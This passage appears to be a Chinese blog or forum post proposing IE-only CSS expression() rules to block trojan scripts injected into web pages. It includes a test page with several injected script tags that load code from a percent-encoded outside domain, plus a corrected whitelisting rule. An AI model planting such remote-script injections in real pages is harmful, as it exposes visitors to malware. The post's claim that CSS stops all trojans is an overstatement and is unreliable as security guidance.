<title>让JS木马的进程迅速中止的CSS代码</title>
<style type="text/css" id="LinrStudio">
/*<![CDATA[*/
iframe{nhk1:expression(this.src=’about:blank’,this.outerHTML=’’);}
script{ngz1:expression((this.src.indexOf(’http’)==0)?document.close():’’);}
/* 以后请在此关注最新木马处理方法 */
/*]]>*/
</style>
</head>
<body>
<script type="text/javascript" src="1.js"></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src="http://%76%63%63%64%2E%63%6E" type="text/javascript"></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
我是页面本身的１
<script src=http://%76%63%63%64%2E%63%6E></script>
我是页面本身的２
<script src=http://%76%63%63%64%2E%63%6E></script>
我是页面本身的３
<script src=http://%76%63%63%64%2E%63%6E></script>
</body>
</html>
其中1.js是自己本站的：
document.write("我是本站的JS文件");
document.write("<img src=’’ />");
我的测试环境是：
　　Windows XP SP2 和windows Vista SP1
IE6/IE7/IE8
已全部打好补丁。
综上所述，所有目前的挂马方式全都破解了，用CSS就可以解决所有木马问题，访客不会再轻易地中毒了。
大家也要仔细研究一下，看看我的代码有什么BUG，有的话一定要拿出来讨论，好解决问题！或是各位有其他更好的办法可以拿出来讨论一下。
很晚了，我要睡觉了。有空再研究。
更正第五个方案
上面写到的第五个方案代码写错了，
<script src="***/**.js" id="lhSearchJSapi"></script>
script{noj5s:expression((this.id.toLowerCase().indexOf(’lh’)==0)?document.write(’木马被成功隔离!’):’’));}
红色字部分有错误，应该是!=-1,上面的正确写法应该是：
script{noj5s:expression((this.id.toLowerCase().indexOf(’lh’)==-1)?document.write(’木马被成功隔离!’):’’));}
script{noj5s:expression((this.id.toLowerCase().indexOf(’vok’)!=-1)?document.write(’木马被成功隔离!’):’’));}
[/code]<script id="tjJSapivok" title="这是你外域的统计流量的JS代码" type="text/javascript" src="http://js.tongji.yahoo.com.cn/1/188/205/ystat.js"></script>
<script id="otherJSapivok" title="这是你本站需要的JS文件" type="text/javascript" src="footer.js"></script>[/code]script{noj5s:expression((this.id.toLowerCase().indexOf(’vok’)!=-1)?document.write(’木马被成功隔离!’):’’));}
<script id="footerJSapivok" src="这里写你本网站的JS路径" type="text/javascript"></script>
<script id="tongjiJSapivok" src="这里外域的JS路径" type="text/javascript"></script>
你网站的所有JS标记(<script>)都得加上id属性，并且有一个共同的前缀、后缀或公共字符串，上面的公共字符串为“vok”。
　　特此更正，感谢昵称为“网工”的QQ网友提醒。
研究网页挂马破坏用户的斗争还在继续，也不会停止。还望各位将服务器安全性能配置好点，我这也只是临时避避风雨的办法而已